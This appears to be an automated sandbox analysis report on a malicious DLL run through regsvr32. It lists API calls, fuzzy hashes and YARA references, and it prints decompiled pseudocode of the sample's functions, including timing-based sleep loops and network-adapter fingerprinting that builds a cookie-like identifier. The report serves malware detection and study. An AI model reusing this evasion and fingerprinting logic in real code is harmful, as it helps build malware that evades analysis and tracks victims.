                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2111281002.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111271093.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111291794.000007FEF8F95000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111308631.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111312450.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                    • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                    • API String ID: 1174013218-1650116920
                                                                                                                                                                                                    • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                    • Instruction ID: 6608af3ea9cadc71cadd7eaf5fd0afc6bc6969bf4d43f0012be74416a8711f7a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D31F772908B858AE764CF25F84435AB6E2F789364F504039D68C97B78EB7CD158CF40
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 000007FEF8F920A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2111281002.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111271093.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111291794.000007FEF8F95000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111308631.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111312450.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                    • API String ID: 4275171209-2766056989
                                                                                                                                                                                                    • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                    • Instruction ID: d852fcecc8c65b33074624bcc973cb4eb89098c5c099dee049a95ff6459d2f31
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF326C76609BC48AD7B5CB56F49079AB7A5F7C9B90F10802AEACD93B18DB38C154CF01
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 020910AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitProcessSleepUser
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 354099737-0
                                                                                                                                                                                                    • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                    • Instruction ID: 14bfbcc53f029022f49e5351b5155d7591c6aca00b3511d287c7726e36b839f3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9C08C30208380C2FB5E5731FC4D3286274A3C0309F000619C20B056E38F7E10D9E303
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 000007FEF8F93100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2111281002.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111271093.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111291794.000007FEF8F95000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111308631.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111312450.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                    • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                    • Instruction ID: 3adc23c25f3a0f1b8435709f589f86897b1c8289c5bdacba1448a615a5bf1034
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19D13F76509BC486D774CB4AE49039AB7A1F3C9790F10902AEACD93B68DF78C094CF40
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 020922DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LookupAccountNameW.ADVAPI32 ref: 0209233C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccountLookupName
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1484870144-0
                                                                                                                                                                                                    • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                    • Instruction ID: d5661cefdbd35f4a2b767e22868c47735d8c4cd0a724804cee2db7dc9978e22b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE315D72705B419AEF118FB5E88439933E4EB89788F584135DE4E57A1AEF38C199E340
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 02092434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                    			E02092434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E020911FC(_t73 - 0x29, _t52);
					_t37 = E0209153C(_t73 - 0x29);
					E02092C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E02091EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E0209272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E02091FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E02092A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                    0x02092434
                                                                                                                                                                                                    0x02092434
                                                                                                                                                                                                    0x02092434
                                                                                                                                                                                                    0x02092434
                                                                                                                                                                                                    0x02092434
                                                                                                                                                                                                    0x02092434
                                                                                                                                                                                                    0x02092434
                                                                                                                                                                                                    0x02092439
                                                                                                                                                                                                    0x0209243f
                                                                                                                                                                                                    0x0209244d
                                                                                                                                                                                                    0x0209244d
                                                                                                                                                                                                    0x0209244d
                                                                                                                                                                                                    0x02092512
                                                                                                                                                                                                    0x02092528
                                                                                                                                                                                                    0x02092450
                                                                                                                                                                                                    0x02092454
                                                                                                                                                                                                    0x02092456
                                                                                                                                                                                                    0x0209245a
                                                                                                                                                                                                    0x02092460
                                                                                                                                                                                                    0x02092468
                                                                                                                                                                                                    0x0209246e
                                                                                                                                                                                                    0x02092472
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x02092474
                                                                                                                                                                                                    0x02092482
                                                                                                                                                                                                    0x0209248c
                                                                                                                                                                                                    0x0209249d
                                                                                                                                                                                                    0x0209249f
                                                                                                                                                                                                    0x020924a4
                                                                                                                                                                                                    0x020924a7
                                                                                                                                                                                                    0x020924b0
                                                                                                                                                                                                    0x020924bf
                                                                                                                                                                                                    0x020924c1
                                                                                                                                                                                                    0x020924cc
                                                                                                                                                                                                    0x020924d2
                                                                                                                                                                                                    0x020924d7
                                                                                                                                                                                                    0x020924db
                                                                                                                                                                                                    0x020924e0
                                                                                                                                                                                                    0x020924e2
                                                                                                                                                                                                    0x020924f0
                                                                                                                                                                                                    0x020924f0
                                                                                                                                                                                                    0x020924fc
                                                                                                                                                                                                    0x02092501
                                                                                                                                                                                                    0x02092504
                                                                                                                                                                                                    0x0209250d
                                                                                                                                                                                                    0x0209250d
                                                                                                                                                                                                    0x02092504
                                                                                                                                                                                                    0x020924cc
                                                                                                                                                                                                    0x020924bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x020924a7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                                    • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                    • Instruction ID: 894e5e71e3bb9ac5bb1b09fbe515ead3588feacd2e3d4552e3993ecc9e25283a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9621CF72300B40AAEF10DFB1E8543DD63A2E788788F484426DE4F57619EF38D55AE750
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 0209260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,02091E13), ref: 0209264B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoNativeSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1721193555-0
                                                                                                                                                                                                    • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                    • Instruction ID: 02a22a7ded9f1056dc3f661b76a9eb0592dbc8ced805d15c411b9e72c1836ed2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29E09263720741D2DF25EB20E8583993361FBC4704F840222894F02675EF3CD6AEDB00
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 02091000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                    • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                    • Instruction ID: 199eb888da48ed38edbcf61d2d36ccd2b26fc5495fc514a1f207ec96fc35b079
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FD0A972F1038183EB318B20EA1B39A6361F3D4319F808206C94F44A65CF7EC199CA00
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                    Analysis Process: regsvr32.exe PID: 2176 Parent PID: 2492 regsvr32.exeCOMMON

                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                    Function 002027BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                                                                    			E002027BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E00202990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x2070c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E00202990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                    0x002027bc
                                                                                                                                                                                                    0x002027bc
                                                                                                                                                                                                    0x002027bc
                                                                                                                                                                                                    0x002027bf
                                                                                                                                                                                                    0x002027c3
                                                                                                                                                                                                    0x002027c7
                                                                                                                                                                                                    0x002027cb
                                                                                                                                                                                                    0x002027d4
                                                                                                                                                                                                    0x002027d7
                                                                                                                                                                                                    0x002027e7
                                                                                                                                                                                                    0x002027ea
                                                                                                                                                                                                    0x002027fa
                                                                                                                                                                                                    0x00202800
                                                                                                                                                                                                    0x00202806
                                                                                                                                                                                                    0x0020285f
                                                                                                                                                                                                    0x0020285f
                                                                                                                                                                                                    0x00202876
                                                                                                                                                                                                    0x0020287b
                                                                                                                                                                                                    0x00202893
                                                                                                                                                                                                    0x00202893
                                                                                                                                                                                                    0x0020280f
                                                                                                                                                                                                    0x00202814
                                                                                                                                                                                                    0x0020281f
                                                                                                                                                                                                    0x0020282c
                                                                                                                                                                                                    0x0020282c
                                                                                                                                                                                                    0x0020282f
                                                                                                                                                                                                    0x00202835
                                                                                                                                                                                                    0x0020283b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00202842
                                                                                                                                                                                                    0x00202845
                                                                                                                                                                                                    0x00202849
                                                                                                                                                                                                    0x00202894
                                                                                                                                                                                                    0x00202897
                                                                                                                                                                                                    0x0020289e
                                                                                                                                                                                                    0x002028a9
                                                                                                                                                                                                    0x002028b5
                                                                                                                                                                                                    0x002028b7
                                                                                                                                                                                                    0x002028ba
                                                                                                                                                                                                    0x002028c1
                                                                                                                                                                                                    0x002028c8
                                                                                                                                                                                                    0x002028cd
                                                                                                                                                                                                    0x002028d0
                                                                                                                                                                                                    0x002028d0
                                                                                                                                                                                                    0x002028b5
                                                                                                                                                                                                    0x002028d7
                                                                                                                                                                                                    0x002028da
                                                                                                                                                                                                    0x002028df
                                                                                                                                                                                                    0x002028e8
                                                                                                                                                                                                    0x002028ed
                                                                                                                                                                                                    0x002028f6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x002028fc
                                                                                                                                                                                                    0x0020284b
                                                                                                                                                                                                    0x00202854
                                                                                                                                                                                                    0x00202859
                                                                                                                                                                                                    0x00202859

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00202CFE,?,?,00000003,002024A4), ref: 0020280F
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00202CFE,?,?,00000003,002024A4), ref: 00202845
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdaptersInfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3177971545-0
                                                                                                                                                                                                    • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                    • Instruction ID: 3c420371a1be33b9440f84438594a021f2b4e0197fa534e6068a36d5abcd18ee
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8319C65611B81D2EB19EF62E8087997762EB49F94F48C026CF0D17796EF38C54DC310
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 00201678, Relevance: 3.1, APIs: 2, Instructions: 77memorynativeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • NtQuerySystemInformation.NTDLL(?,?,00000000,00202CB1,?,?,00000003,002024A4), ref: 002016CB
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,?,00000000,00202CB1,?,?,00000003,002024A4), ref: 00201709
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeapInformationQuerySystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3114120137-0
                                                                                                                                                                                                    • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                    • Instruction ID: c328992289bf991f6212d472623673a89c8f61bc8fd52abc1e412564811b72c4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF219565725B4183EF19EF52A848355A2A2FF85BC1F188034DF0A577A6EF3CC9658700
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 00201810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                    • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                    • Instruction ID: 9efea63201c58450c94c988a18ba81fab029b61ac03d217f26770085c014dca7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9171F072321B8287EB24CF62E854BA977A1FB88B94F448125DF4A53F95DF38C5A5C700
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 002010AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitProcessSleepUser
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 354099737-0
                                                                                                                                                                                                    • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                    • Instruction ID: 10d80fdca22810e5da5c10328df80ee21a9756f5c7852084ec4bac4bf90f0e13
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9C08C30520780C2F31D7B60E88C3282237A700305F00861DC34305AE28F3C04F8C703
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 002022DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LookupAccountNameW.ADVAPI32 ref: 0020233C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccountLookupName
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1484870144-0
                                                                                                                                                                                                    • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                    • Instruction ID: 4b0ea20dc380f593552e4f97726c677bb179d0827474fd1791e922d15cb8090e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20318DB2711B41CAEB149FB4E84839933A5EB48B88F588136DB4D67B5AEF38C55CC340
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 00202434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                    			E00202434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E002011FC(_t73 - 0x29, _t52);
					_t37 = E0020153C(_t73 - 0x29);
					E00202C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E00201EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E0020272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E00201FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E00202A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                    0x00202434
                                                                                                                                                                                                    0x00202434
                                                                                                                                                                                                    0x00202434
                                                                                                                                                                                                    0x00202434
                                                                                                                                                                                                    0x00202434
                                                                                                                                                                                                    0x00202434
                                                                                                                                                                                                    0x00202434
                                                                                                                                                                                                    0x00202439
                                                                                                                                                                                                    0x0020243f
                                                                                                                                                                                                    0x0020244d
                                                                                                                                                                                                    0x0020244d
                                                                                                                                                                                                    0x0020244d
                                                                                                                                                                                                    0x00202512
                                                                                                                                                                                                    0x00202528
                                                                                                                                                                                                    0x00202450
